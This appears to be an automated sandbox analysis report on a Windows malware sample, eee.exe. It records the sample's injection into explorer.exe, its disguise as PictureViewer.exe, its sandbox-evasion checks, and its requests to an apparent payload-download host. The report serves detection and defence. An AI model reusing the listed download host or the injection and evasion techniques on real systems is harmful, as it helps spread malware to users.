Edit tour

Windows Analysis Report
eee.exe

Overview

General Information

Sample Name:	eee.exe
Analysis ID:	1314331
MD5:	89f71046c8298c6ef2db92fe202f9b43
SHA1:	1fad31eedaa7437e96f9a13f60e85c1d14afa08f
SHA256:	6a096c8158da4e2453ba68fe0f780c2e4181c01f125d7831fc5d58a77faf792c
Tags:	exe
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Maps a DLL or memory area into another process

Writes to foreign memory regions

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Uses 32bit PE files

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Drops files with a non-matching file extension (content does not match file extension)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Drops PE files

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

eee.exe (PID: 6708 cmdline: C:\Users\user\Desktop\eee.exe MD5: 89F71046C8298C6EF2DB92FE202F9B43)

cmd.exe (PID: 6384 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 86191D9E0E30631DB3E78E4645804358)

explorer.exe (PID: 3496 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6F5D250EAEDE1D80806ECBC487C7B9B8)

cleanup

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Sep 2023 07:46:55 GMTContent-Type: application/json; charset=utf-8Content-Length: 64Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomainsStatus-NO-Id: ngx-site-r07-01.dp

Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: eee.exe, 00000001.00000002.1064267854.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.000000000564E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.000000000509A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stable3download.ocmtancmi2c5t.website/httpbin/1370699322.png
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stable4download.ocmtancmi2c5t.website/Q
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stable4download.ocmtancmi2c5t.website/h
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, eee.exe, 00000001.00000002.1063457757.00000000004C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stable4download.ocmtancmi2c5t.website/httpbin/1370699322.png
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stable4download.ocmtancmi2c5t.website/httpbin/1370699322.pnge
Source: eee.exe	String found in binary or memory: https://wildberries.ru/update2/update.jsonIFFIMAGEPVWndProcSubClassOriginalWindowClassSizingWindowMo
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wildberries.ru/update2/update.jsoni
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wildberries.ru/
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, eee.exe, 00000001.00000003.1038721876.0000000000525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wildberries.ru/update2/update.json
Source: eee.exe, 00000001.00000003.1038721876.0000000000525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wildberries.ru/update2/update.jsonLocationETagAuthentication-InfoAgeAccept-RangesLast-Mo

Source: unknown

DNS traffic detected: queries for: wildberries.ru

Source: global traffic	HTTP traffic detected: GET /update2/update.json HTTP/1.1Connection: Keep-AliveHost: wildberries.ru
Source: global traffic	HTTP traffic detected: GET /update2/update.json HTTP/1.1Connection: Keep-AliveHost: www.wildberries.ru
Source: global traffic	HTTP traffic detected: GET /httpbin/1370699322.png HTTP/1.1Connection: Keep-AliveHost: stable4download.ocmtancmi2c5t.website

Source: unknown	HTTPS traffic detected: 185.138.252.1:443 -> 192.168.2.8:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.138.252.1:443 -> 192.168.2.8:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.22:443 -> 192.168.2.8:49766 version: TLS 1.2

Source: eee.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0041180E	1_2_0041180E
Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0040C1D0	1_2_0040C1D0
Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_00415A9E	1_2_00415A9E
Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0040F734	1_2_0040F734

Source: C:\Users\user\Desktop\eee.exe

Code function: String function: 0040F6E8 appears 36 times

Source: eee.exe, 00000001.00000002.1063934940.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePictureViewer.exe4 vs eee.exe
Source: eee.exe, 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePictureViewer.exe4 vs eee.exe
Source: eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamezip.exe( vs eee.exe
Source: eee.exe, 00000001.00000002.1064360129.00000000033D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs eee.exe
Source: eee.exe	Binary or memory string: OriginalFilenamePictureViewer.exe4 vs eee.exe

Source: eee.exe

Static PE information: invalid certificate

Source: eee.exe	ReversingLabs: Detection: 13%
Source: eee.exe	Virustotal: Detection: 15%

Source: C:\Users\user\Desktop\eee.exe

File read: C:\Users\user\Desktop\eee.exe

Jump to behavior

Source: eee.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\eee.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eee.exe C:\Users\user\Desktop\eee.exe
Source: C:\Users\user\Desktop\eee.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\eee.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\eee.exe

File created: C:\Users\user\AppData\Roaming\JWMACKAFRTBA

Jump to behavior

Source: C:\Users\user\Desktop\eee.exe

File created: C:\Users\user\AppData\Local\Temp\e8bd7ec2

Jump to behavior

Source: classification engine

Classification label: mal68.evad.winEXE@6/3@3/2

Source: C:\Users\user\Desktop\eee.exe

Code function: 1_2_00404A20 lstrcatA,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,

1_2_00404A20

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03

Source: C:\Users\user\Desktop\eee.exe

Code function: 1_2_00409AA0 FindResourceA,FindResourceA,FindResourceA,LoadResource,LockResource,SizeofResource,FreeResource,

1_2_00409AA0

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: eee.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\bwa\QuickTimeWin-637\srcroot\BuildResults\NoSym\PictureViewer.pdb source: eee.exe
Source:	Binary string: wntdll.pdbUGP source: eee.exe, 00000001.00000002.1064360129.00000000032B4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232230831.00000000052EF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232546270.0000000005760000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232472369.0000000004D31000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232726923.00000000051A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: eee.exe, 00000001.00000002.1064360129.00000000032B4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232230831.00000000052EF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232546270.0000000005760000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232472369.0000000004D31000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232726923.00000000051A0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0040F3D0 push eax; ret	1_2_0040F3E4
Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0040F3D0 push eax; ret	1_2_0040F40C
Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0040F723 push ecx; ret	1_2_0040F733

Source: igwjsumi.2.dr

Static PE information: section name: ueaa

Source: C:\Users\user\Desktop\eee.exe

Code function: 1_2_0041347E LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0041347E

Source: igwjsumi.2.dr	Static PE information: real checksum: 0x0 should be: 0x7b80a
Source: eee.exe	Static PE information: real checksum: 0x74c8a should be: 0x79d24

Source: initial sample

Static PE information: section name: .text entropy: 6.832069734533301

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\igwjsumi

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\igwjsumi

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\IGWJSUMI

Source: C:\Users\user\Desktop\eee.exe TID: 5196

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\eee.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-11554

Source: C:\Users\user\Desktop\eee.exe

API coverage: 6.9 %

Source: C:\Users\user\Desktop\eee.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\eee.exe

Code function: 1_2_00416961 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,

1_2_00416961

Source: C:\Users\user\Desktop\eee.exe

API call chain: ExitProcess graph end node

graph_1-11556

Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: eee.exe, 00000001.00000002.1063457757.000000000048E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/N%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0

Source: C:\Users\user\Desktop\eee.exe

Code function: 1_2_0041347E LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0041347E

Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0040FF42 SetUnhandledExceptionFilter,		1_2_0040FF42
Source: C:\Users\user\Desktop\eee.exe	Code function: 1_2_0040FF2E SetUnhandledExceptionFilter,		1_2_0040FF2E

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\cmd.exe

Section loaded: C:\Users\user\AppData\Local\Temp\igwjsumi target: C:\Windows\SysWOW64\explorer.exe protection: read write

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F37AC0			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 660000			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 3496 base: F37AC0 value: 55			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 3496 base: 660000 value: 00			Jump to behavior

Source: C:\Users\user\Desktop\eee.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: eee.exe	Binary or memory string: Shell_TrayWnd
Source: eee.exe	Binary or memory string: FShell_TrayWndQuickTime UnavailableQuickTime failed to initialize. Error # %ld
Source: eee.exe	Binary or memory string: FShell_TrayWnd

Source: C:\Users\user\Desktop\eee.exe	Code function: GetLocaleInfoA,GetUserDefaultLCID,GetFileAttributesA,		1_2_0040A650
Source: C:\Users\user\Desktop\eee.exe	Code function: GetLocaleInfoA,		1_2_00416740

Source: C:\Users\user\Desktop\eee.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\eee.exe

Code function: 1_2_0040F536 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_0040F536

Source: C:\Users\user\Desktop\eee.exe

Code function: 1_2_0040F0BD EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA,

1_2_0040F0BD

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	1 DLL Side-Loading	312 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	312 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	15 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Software Packing	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
